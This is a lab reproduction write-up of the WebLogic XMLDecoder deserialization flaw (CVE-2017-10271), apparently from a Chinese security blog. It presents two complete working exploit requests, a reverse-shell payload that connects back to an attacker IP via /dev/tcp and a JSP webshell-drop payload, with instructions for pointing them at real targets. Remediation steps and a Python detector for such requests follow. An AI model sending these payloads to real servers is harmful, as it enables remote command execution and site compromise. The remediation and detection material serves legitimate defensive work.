Reproducing the WebLogic XMLDecoder Deserialization Vulnerability (CVE-2017-10271)


Vulnerability background

WebLogic's WLS Security component exposes a web service that uses XMLDecoder to parse user-supplied XML data. A deserialization flaw in that parsing step allows arbitrary command execution.

Exploitation scenario

Port-scan the target host's IP with Nmap; port 7001 is found open.

```
(base) ➜ ~ nmap -A 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 09:41 CST
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (1.0s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
7001/tcp open  http    Oracle WebLogic Server (Servlet 2.5; JSP 2.1)
|_http-title: Error 404--Not Found
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.60 seconds
```

Open the page on port 7001 in a browser.

The error page reveals the WebLogic version. Append /console after the port to see whether the WebLogic administration console opens; in real deployments, developers usually block the admin console.

Also append /wls-wsat after the IP to check whether the vulnerable component is present.

A 403 means the component exists but access to it is restricted; at this point the author concludes the vulnerability is present.

Exploitation method

Capturing the request with Burp Suite

Open the page in Firefox and start Burp Suite to capture the request.

Reverse shell POC:

```
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.211.55.6:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/bash</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>bash -i &gt;&amp; /dev/tcp/192.168.31.240/4444 0&gt;&amp;1</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```

Two things need attention when using the reverse shell POC:

1. The Host header IP is the target host's IP. The target used in this demo is 10.211.55.6; in an actual penetration test, change the Host IP to match the real target.

2. The reverse shell IP is the attacking machine's IP address; adjust it to your own IP.

After changing the parameters in Burp Suite, right-click the request and send it to the Repeater tab.

Before clicking Send, open a shell window on the attacking machine and listen on the attacker IP and port you configured.

Then click Send in Burp Suite. The exploit succeeds and the target host's shell is returned in the listening shell window.

Webshell write POC:

```
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.211.55.6:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <java version="1.4.0" class="java.beans.XMLDecoder">
          <object class="java.io.PrintWriter">
            <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
            <void method="println">
              <string><![CDATA[<% out.print("Hacked By 攻防SRC"); %>]]></string>
            </void>
            <void method="close"/>
          </object>
        </java>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```

After changing the POC above to the target host's IP in Burp Suite, send the request.

Visit the webshell address:

The vulnerability has now been exploited successfully.

Pitfalls

Using nc

You still need to check how nc is invoked on different systems. Typing nc in a shell window prints its usage.


Remediation

1. Temporary workaround: depending on business requirements, consider removing the WLS-WebServices component. The paths containing this component are:

```
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
Middleware/wlserver_10.3/server/lib/wls-wsat.war
```

All of these paths are under the WebLogic installation directory. After deleting the files, restart WebLogic and confirm that http://weblogic_ip/wls-wsat/ now returns a 404 page.

2. Download and apply the security patch provided on Oracle's website.
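Besides removing the component or patching, a defender can detect attempts against this flaw on the wire: every public CVE-2017-10271 payload smuggles an XMLDecoder document (a `<java>` element) inside the `work:WorkContext` SOAP header of a request to /wls-wsat/. The following is an added detection example, not code from the original post; the function name, the gadget-class list and the two sample bodies are my own constructions.

```python
import xml.etree.ElementTree as ET

WORKAREA = "http://bea.com/2004/06/soap/workarea/"
# Gadget classes seen in the public CVE-2017-10271 payloads (command execution, file drops).
GADGET_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime",
                  "java.io.PrintWriter", "java.io.FileOutputStream"}


def inspect_soap_request(body: str) -> dict:
    """Classify one SOAP request body sent to /wls-wsat/*.

    A <java> element inside the work:WorkContext header is the XMLDecoder document
    root that the vulnerable WorkContext adapter deserializes, so its presence alone
    flags the request; any gadget classes found are returned for the alert.
    Unparseable XML is reported with its own reason."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return {"suspicious": True, "reason": "malformed-xml", "classes": []}
    classes, decoder_root = set(), False
    for ctx in root.iter("{%s}WorkContext" % WORKAREA):
        for el in ctx.iter():
            if el.tag.rsplit("}", 1)[-1] == "java":   # local name, namespace stripped
                decoder_root = True
            if el.get("class") in GADGET_CLASSES:
                classes.add(el.get("class"))
    if decoder_root:
        return {"suspicious": True, "reason": "xmldecoder-in-workcontext",
                "classes": sorted(classes)}
    return {"suspicious": False, "reason": "", "classes": []}


# Constructed sample bodies (not captured traffic): a benign envelope and one that
# carries the ProcessBuilder pattern used by the reverse shell POC above.
BENIGN = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soapenv:Header/><soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>'
)
MALICIOUS = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soapenv:Header><work:WorkContext xmlns:work="' + WORKAREA + '">'
    '<java version="1.4.0" class="java.beans.XMLDecoder">'
    '<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">'
    '<void index="0"><string>id</string></void></array><void method="start"/></void>'
    '</java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(name, inspect_soap_request(body))
```

The same check can be applied to WebLogic access logs only if request bodies are recorded, so in practice it belongs in a reverse proxy, WAF or IDS rule in front of port 7001.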

Going further

While reproducing this vulnerability I came across a WebLogic XMLDecoder deserialization check tool that can quickly test whether a target host is affected, which improves penetration testing efficiency.



This article was originally published on the WeChat public account 攻防SRC (SNNUSRC).
